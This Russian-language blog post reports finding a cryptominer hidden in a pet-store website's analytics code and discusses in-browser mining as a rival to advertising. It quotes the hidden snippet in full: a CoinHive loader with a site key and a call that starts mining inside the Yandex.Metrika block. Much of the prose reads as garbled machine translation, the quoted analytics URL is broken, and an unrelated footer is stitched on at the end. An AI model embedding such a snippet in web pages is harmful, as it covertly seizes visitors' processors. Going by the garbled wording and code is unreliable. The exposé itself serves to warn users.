Совсем недавно появилась новость о компании Pirate Bay, которая начала тестирование криптомайнера JavaScript как альтернативы традиционной рекламной модели.
Теперь, судя по всему, нас ждет волна интеграции подобных скриптов в каждый небольшой магазин по продаже швейной фурнитуры.
Буквально сегодня наткнулся на подобный скрипт, встроенный в код сайта zveruga.net — небольшая сеть по продаже товаров для животных.
Зоомагазин и скрипты
Сегодня позвонил отец и сказал, что Kaspersky Total Security жалуется на скрипт майнинга на сайте зоомагазина.И мне даже удалось безуспешно поспорить по этому поводу с девушкой на первой линии поддержки.
С предсказуемым результатом "? э.
Что? Скрипты?" Из любопытства я решил проверить, сработала ли ложная эвристика.
Оказалось, что это работает совершенно корректно - в коде главной страницы.
http://www.zveruga.net/ Нашёл странную вставку:
Кусок скрипта, активирующий майнинг, оказался встроенным в блок Яндекс.<!-- Yandex.Metrika counter --> <script src=" https://coin-hive.com/lib/coinhive.min.js "></script> <script> var miner = new CoinHive.Anonymous('PW7FI1VfOmLOORjnVtJqS62MdJTJFiOl'); miner.start(); </script> <script type="text/javascript"> (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24517820 = new Ya.Metrika({ id:24517820 , webvisor:true , clickmap:true , trackLinks:true , accurateTrackBounce:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "http:// mc.yandex.ru/metrika/watch.js "; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); </script> <noscript><div><img src="http:// mc.yandex.ru/watch/24517820 " style=" position:absolute ; left:-9999px;" alt="" /></div></noscript> <!-- /Yandex.Metrika counter -->
Метрики.
При активации призракерия не проявляла активности, но как только ее временно отключали, все ядра Процессор тут же был загружен вычислениями.
Молодцы ребята из Мозиллы.
Теперь многопоточность!) 
Почему они съедают мои ресурсы?
Сам по себе такой майнинг крайне неэффективен.Плюс требуется открытая вкладка со скриптом, что делает интеграцию значимой только там, где пользователь действительно проводит много времени.
Порнхаб не подойдет, да.
Поэтому есть несколько вариантов:
- Сайт кривой - у них даже на странице входа нет HTTPS! Китайские боты взломали и напихали повсюду скрипты.
- Мы действительно решили заработать.
Почему бы не добавить еще капельку дохода помимо рекламы.
- Админу на пиво не хватило.
Поедание 100% загрузки ЦП — очень и очень грязный шаг.
Тем не менее, об этом следует предупредить пользователя, который не ожидает от браузера такой подлости.
В Kubuntu Linux подтормаживание интерфейса не ощущается, видимо, из-за правильной расстановки приоритетов, а вот в Windows 7 система заметно начинает тормозить.
Немного страшно представить ситуацию, когда каждая вкладка начинает съедать системные ресурсы, пытаюсь убить всех остальных .
Адблок для майнеров
В целом вся эта фигня выглядит как смесь очередной волны вредоносного ПО и поиска альтернативной модели заработка.Многие клавиатуры уже попираются в онлайн-баталиях по поводу этики блокировки рекламы.
Вечная проблема столкновения интересов двух сторон – пользователь хочет качественный контент, создатель контента и сервиса хочет окупить свои затраты и немного заработать.
А еще на стороне построены рекламные сети.
С распространением блокировщиков рекламы ситуация становится все более напряженной.
Кто-то уходит совсем, кто-то начинает показывать жалобных голодных котиков или переходит на платную модель подписки.
Большинство тупо превращаются в сгенерированные копирайтеры на еду сценарии дампа мусора с заголовками типа Роспотребнадзор обвинил селфи в распространении вшей .
Возможность выкинуть рекламодателей «на мороз» выглядит крайне заманчивой для тех ресурсов, которые традиционно преследуются официальными властями — торрент-трекеров, продавцов не того укропа и тому подобное.
Но для обычных посещаемых ресурсов это может стать интересной альтернативой рекламной модели.
Основные проблемы заключаются в нескольких моментах:
- Деньги капают крошечными крошками с каждого пользователя.
- Вкладка со скриптом и браузером должны быть открыты как можно дольше, что в принципе не очень характерно для современного варианта перехода со страницы на страницу.
- Конкуренция за ЦП между отдельными онлайн-сервисами.
Процессор не резиновый, и каждый норовит включить майнинг на полную мощность, чтобы за короткое время успеть урвать хоть что-то.
С одной стороны, они вроде бы на стороне огромной массы малограмотных пользователей.
С другой стороны, они стали позволять себе очень многое в плане того, что пользователь может делать, а что нет, врастая во все возможные части операционной системы.
Похоже, нас ждет интересное ближайшее будущее.
Ждем ответа от браузеров, которые блокируют выполнение кода на неактивных вкладках.
И еще один слой блокировщиков.
Одиночные пользователи с радикальным NoScript, вероятно, снова пропустят все самое интересное.
В опросе могут участвовать только зарегистрированные пользователи.
Войти , Пожалуйста.
В чем проблема описанного сайта? 24,34% Китайские боты взломали и напихали повсюду скрипты.
313 21,7% Действительно решил заработать.
279 49.53% Админу на пиво не хватило.
637 4,43% Другое 57 Проголосовали 1286 пользователей.
397 пользователей воздержались.
Теги: #monero #JavaScript #интернет-реклама #криптовалюта #майнинг #Разработка сайтов #JavaScript
-
Git Волшебство
19 Oct, 24
